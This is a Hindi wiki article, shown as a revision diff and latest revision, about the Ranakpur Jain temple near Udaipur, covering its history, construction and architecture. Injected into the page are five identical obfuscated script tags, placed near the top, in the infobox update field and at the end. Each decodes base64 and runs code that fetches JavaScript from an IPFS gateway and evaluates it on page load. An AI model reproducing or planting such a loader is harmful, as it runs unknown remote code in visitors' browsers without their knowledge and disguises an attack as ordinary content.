Difference between revisions of "रणकपुर जैन मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "नक्काशी " to "नक़्क़ाशी ")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
[[चित्र:Ranakpur-Jain-Temple.jpg|thumb|250px|रणकपुर जैन मंदिर, उदयपुर]]
+
{{सूचना बक्सा संक्षिप्त परिचय
[[राजस्थान]] में स्थित रणकपुर [[जैन धर्म]] के पाँच प्रमुख तीर्थस्‍थलों में से एक है। यह स्‍थान खूबसूरती से तराशे गए प्राचीन जैन मंदिरों के लिए प्रसिद्ध है। रणकपुर मंदिर [[उदयपुर]] से 96 किलोमीटर की दूरी पर है। [[भारत]] के जैन मंदिरों में संभवतः इसकी इमारत सबसे भव्य तथा विशाल है।
+
|चित्र=Ranakpur-Jain-Temple-4.jpg
 +
|चित्र का नाम=रणकपुर जैन मंदिर
 +
|विवरण='रणकपुर जैन मंदिर' [[राजस्थान]] में स्थित [[जैन धर्म]] के पाँच प्रमुख तीर्थस्‍थलों में से एक है। यह स्‍थान ख़ूबसूरती से तराशे गए प्राचीन जैन मंदिरों के लिए प्रसिद्ध है।
 +
|शीर्षक 1=राज्य
 +
|पाठ 1=[[राजस्थान]]
 +
|शीर्षक 2=ज़िला
 +
|पाठ 2=[[उदयपुर]]
 +
|शीर्षक 3=निर्देशांक
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=निर्माण काल
 +
|पाठ 5=600 [[वर्ष]] पूर्व 1446 [[विक्रम संवत]]
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[राजस्थान]], [[उदयपुर]], [[मेवाड़]], [[मेवाड़ का इतिहास]], [[मेवाड़ (आज़ादी से पूर्व)]]
 +
|अन्य जानकारी= मंदिर के उत्तर में रायन पेड़ स्थित है। इसके अलावा संगमरमर के टुकड़े पर भगवान [[ऋषभदेव]] के पदचिह्न भी हैं। ये भगवान ऋषभदेव तथा शत्रुंजय की शिक्षाओं की याद दिलाते हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|16:40, 6 नवम्बर 2016 (IST)}}
 +
}}
 +
'''रणकपुर जैन मंदिर''' [[राजस्थान]] में स्थित [[जैन धर्म]] के पाँच प्रमुख तीर्थस्‍थलों में से एक है। यह स्‍थान ख़ूबसूरती से तराशे गए प्राचीन जैन मंदिरों के लिए प्रसिद्ध है। रणकपुर मंदिर [[उदयपुर]] से 96 किलोमीटर की दूरी पर है। [[भारत]] के जैन मंदिरों में संभवतः इसकी इमारत सबसे भव्य तथा विशाल है।
  
 
==इतिहास==
 
==इतिहास==
 
इन मंदिरों का निर्माण 15वीं शताब्‍दी में राणा कुंभा के शासनकाल में हुआ था। इन्‍हीं के नाम पर इस जगह का नाम रणकपुर पड़ा। यहाँ के जैन मंदिर भारतीय स्‍थापत्‍य कला का अद्भुत नमूना है। केवल रणकपुर में ही नहीं बल्कि उसके आस पास की जगहों में भी अनेक प्राचीन मंदिर हैं। जैन धर्म के आस्‍था रखने वालों के साथ-साथ वास्‍तुशिल्‍प के दिलचस्‍पी रखने वालों को भी यह जगह बहुत भाती है।<ref>{{cite web |url=http://www.yatrasalah.com/PhotoGallary.aspx?gallery=240 |title=रणकपुर |accessmonthday= [[27 सितंबर]]|accessyear=2011 |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=हिन्दी }}</ref>  
 
इन मंदिरों का निर्माण 15वीं शताब्‍दी में राणा कुंभा के शासनकाल में हुआ था। इन्‍हीं के नाम पर इस जगह का नाम रणकपुर पड़ा। यहाँ के जैन मंदिर भारतीय स्‍थापत्‍य कला का अद्भुत नमूना है। केवल रणकपुर में ही नहीं बल्कि उसके आस पास की जगहों में भी अनेक प्राचीन मंदिर हैं। जैन धर्म के आस्‍था रखने वालों के साथ-साथ वास्‍तुशिल्‍प के दिलचस्‍पी रखने वालों को भी यह जगह बहुत भाती है।<ref>{{cite web |url=http://www.yatrasalah.com/PhotoGallary.aspx?gallery=240 |title=रणकपुर |accessmonthday= [[27 सितंबर]]|accessyear=2011 |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=हिन्दी }}</ref>  
 +
 
==निर्माण काल==
 
==निर्माण काल==
 
यह इमारत लगभग 40,000 वर्ग फीट में फैली है। संभवतः 600 [[वर्ष]] पूर्व 1446 [[विक्रम संवत]] में इस मंदिर का निर्माण कार्य प्रारम्भ हुआ था जो 50 वर्षों से अधिक समय तक चला। इसके निर्माण में क़रीब 99 लाख रुपए का खर्च किए गए थे। उदयपुर से रणकपुर जैन मन्दिर के लिए प्राइवेट बसें तथा टैक्सियाँ उपलब्ध रहती हैं।  
 
यह इमारत लगभग 40,000 वर्ग फीट में फैली है। संभवतः 600 [[वर्ष]] पूर्व 1446 [[विक्रम संवत]] में इस मंदिर का निर्माण कार्य प्रारम्भ हुआ था जो 50 वर्षों से अधिक समय तक चला। इसके निर्माण में क़रीब 99 लाख रुपए का खर्च किए गए थे। उदयपुर से रणकपुर जैन मन्दिर के लिए प्राइवेट बसें तथा टैक्सियाँ उपलब्ध रहती हैं।  
 
+
[[चित्र:Ranakpur-Jain-Temple.jpg|thumb|250px|left|रणकपुर जैन मंदिर, उदयपुर]]
 
==प्रवेश द्वार==
 
==प्रवेश द्वार==
 
मंदिर में चार कलात्मक प्रवेश द्वार हैं। मंदिर के मुख्य गृह में तीर्थंकर आदिनाथ की संगमरमर से बनी चार विशाल मूर्तियाँ हैं। संभवतः 72 इंच ऊँची ये मूतियाँ चार अलग दिशाओं की ओर उन्मुख हैं। इसी कारण इसे चतुर्मुख मंदिर कहा जाता है।
 
मंदिर में चार कलात्मक प्रवेश द्वार हैं। मंदिर के मुख्य गृह में तीर्थंकर आदिनाथ की संगमरमर से बनी चार विशाल मूर्तियाँ हैं। संभवतः 72 इंच ऊँची ये मूतियाँ चार अलग दिशाओं की ओर उन्मुख हैं। इसी कारण इसे चतुर्मुख मंदिर कहा जाता है।
Line 18: Line 47:
  
 
मंदिर के निर्माताओं ने जहाँ कलात्मक दो मंजिला भवन का निर्माण किया है, वहीं भविष्य में किसी संकट का अनुमान लगाते हुए कई तहखाने भी बनाए हैं। इन तहखानों में पवित्र मूर्तियों को सुरक्षित रखा जा सकता है। ये तहखाने मंदिर के निर्माताओं की निर्माण संबंधी दूरदर्शिता का परिचय देते हैं।<ref>{{cite web |url=http://hindi.webdunia.com/रणकपुर-जैन-मंदिर/रणकपुर-का-जैन-मंदिर-1081020084_1.htm |title=रणकपुर का जैन मंदिर |accessmonthday=[[27 सितंबर]] |accessyear=2011 |last= |first= |authorlink= |format=एच. टी. एम |publisher=वेब दूनिया हिन्दी|language=हिन्दी }}</ref>
 
मंदिर के निर्माताओं ने जहाँ कलात्मक दो मंजिला भवन का निर्माण किया है, वहीं भविष्य में किसी संकट का अनुमान लगाते हुए कई तहखाने भी बनाए हैं। इन तहखानों में पवित्र मूर्तियों को सुरक्षित रखा जा सकता है। ये तहखाने मंदिर के निर्माताओं की निर्माण संबंधी दूरदर्शिता का परिचय देते हैं।<ref>{{cite web |url=http://hindi.webdunia.com/रणकपुर-जैन-मंदिर/रणकपुर-का-जैन-मंदिर-1081020084_1.htm |title=रणकपुर का जैन मंदिर |accessmonthday=[[27 सितंबर]] |accessyear=2011 |last= |first= |authorlink= |format=एच. टी. एम |publisher=वेब दूनिया हिन्दी|language=हिन्दी }}</ref>
[[चित्र:Ranakpur-Jain-Temple-Udaipur.jpg|thumb|550px|center|रणकपुर जैन मंदिर, उदयपुर]]
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
==वीथिका==
 +
[[चित्र:Ranakpur-Jain-Temple-Udaipur.jpg|thumb|450px|center|रणकपुर जैन मंदिर, [[उदयपुर]]]]
 +
<gallery>
 +
चित्र:Ranakpur-Jain-Temple-1.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
चित्र:Ranakpur-Jain-Temple-2.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
चित्र:Ranakpur-Jain-Temple-3.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
चित्र:Ranakpur-Jain-Temple-6.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
चित्र:Ranakpur-Jain-Temple-7.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
चित्र:Ranakpur-Jain-Temple-8.jpg|रणकपुर जैन मंदिर, [[उदयपुर]]
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
{{राजस्थान के पर्यटन स्थल}}
+
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}{{जैन धर्म2}}
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
Line 33: Line 69:
 
[[Category:जैन मन्दिर]]
 
[[Category:जैन मन्दिर]]
 
[[Category:राजस्थान के धार्मिक स्थल]]
 
[[Category:राजस्थान के धार्मिक स्थल]]
 +
[[Category:जैन धार्मिक स्थल]]
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:धार्मिक स्थल कोश]]
==संबंधित लेख==
 
 
[[Category:नया पन्ना सितंबर-2011]]
 
  
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 11:19, 19 July 2017

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ranakapur jain mandir
vivaran 'ranakapur jain mandir' rajasthan mean sthit jain dharm ke paanch pramukh tirthash‍thaloan mean se ek hai. yah sh‍than khoobasoorati se tarashe ge prachin jain mandiroan ke lie prasiddh hai.
rajy rajasthan
zila udayapur
nirman kal 600 varsh poorv 1446 vikram sanvat
sanbandhit lekh rajasthan, udayapur, meva d, meva d ka itihas, meva d (azadi se poorv)
any janakari mandir ke uttar mean rayan pe d sthit hai. isake alava sangamaramar ke tuk de par bhagavan rrishabhadev ke padachihn bhi haian. ye bhagavan rrishabhadev tatha shatruanjay ki shikshaoan ki yad dilate haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ranakapur jain mandir rajasthan mean sthit jain dharm ke paanch pramukh tirthash‍thaloan mean se ek hai. yah sh‍than khoobasoorati se tarashe ge prachin jain mandiroan ke lie prasiddh hai. ranakapur mandir udayapur se 96 kilomitar ki doori par hai. bharat ke jain mandiroan mean sanbhavatah isaki imarat sabase bhavy tatha vishal hai.

itihas

in mandiroan ka nirman 15vian shatabh‍di mean rana kuanbha ke shasanakal mean hua tha. inh‍hian ke nam par is jagah ka nam ranakapur p da. yahaan ke jain mandir bharatiy sh‍thapath‍y kala ka adbhut namoona hai. keval ranakapur mean hi nahian balki usake as pas ki jagahoan mean bhi anek prachin mandir haian. jain dharm ke ash‍tha rakhane valoan ke sath-sath vash‍tushilh‍p ke dilachash‍pi rakhane valoan ko bhi yah jagah bahut bhati hai.[1]

nirman kal

yah imarat lagabhag 40,000 varg phit mean phaili hai. sanbhavatah 600 varsh poorv 1446 vikram sanvat mean is mandir ka nirman kary prarambh hua tha jo 50 varshoan se adhik samay tak chala. isake nirman mean qarib 99 lakh rupe ka kharch kie ge the. udayapur se ranakapur jain mandir ke lie praivet basean tatha taiksiyaan upalabdh rahati haian. thumb|250px|left|ranakapur jain mandir, udayapur

pravesh dvar

mandir mean char kalatmak pravesh dvar haian. mandir ke mukhy grih mean tirthankar adinath ki sangamaramar se bani char vishal moortiyaan haian. sanbhavatah 72 ianch ooanchi ye mootiyaan char alag dishaoan ki or unmukh haian. isi karan ise chaturmukh mandir kaha jata hai.

sthapaty kala

mandir ki pramukh visheshata isake saik doan khambhe haian. inaki sankhya sanbhavatah 1444 hai. jis taraph bhi drishti jati hai chhote-b de akaroan ke khambhe dikhaee dete haian, parantu ye khambhe is prakar banae ge haian ki kahian se bhi dekhane par mukhy pavitr sthal ke 'darshan' mean badha nahian pahuanchati hai. in khambhoan par suandar naqqashi ki gee hai.

isake alava mandir mean 76 chhote gumbadanuma pavitr sthan, char b de prarthana kaksh tatha char b de poojan sthal haian. ye manushy ko jivan-mrityu ki 84 yoniyoan se mukti prapt kar moksh prapt karane ke lie prerit karate haian.

mandir ke uttar mean rayan pe d sthit hai. isake alava sangamaramar ke tuk de par bhagavan rrishabhadev ke padachihn bhi haian. ye bhagavan rrishabhadev tatha shatruanjay ki shikshaoan ki yad dilate haian.

mandir ke nirmataoan ne jahaan kalatmak do manjila bhavan ka nirman kiya hai, vahian bhavishy mean kisi sankat ka anuman lagate hue kee tahakhane bhi banae haian. in tahakhanoan mean pavitr moortiyoan ko surakshit rakha ja sakata hai. ye tahakhane mandir ke nirmataoan ki nirman sanbandhi dooradarshita ka parichay dete haian.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

[[chitr:Ranakpur-Jain-Temple-Udaipur.jpg|thumb|450px|center|ranakapur jain mandir, udayapur]]

tika tippani aur sandarbh

  1. ranakapur (hindi) yatra salah. abhigaman tithi: 27 sitanbar, 2011.
  2. ranakapur ka jain mandir (hindi) (ech. ti. em) veb dooniya hindi. abhigaman tithi: 27 sitanbar, 2011.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>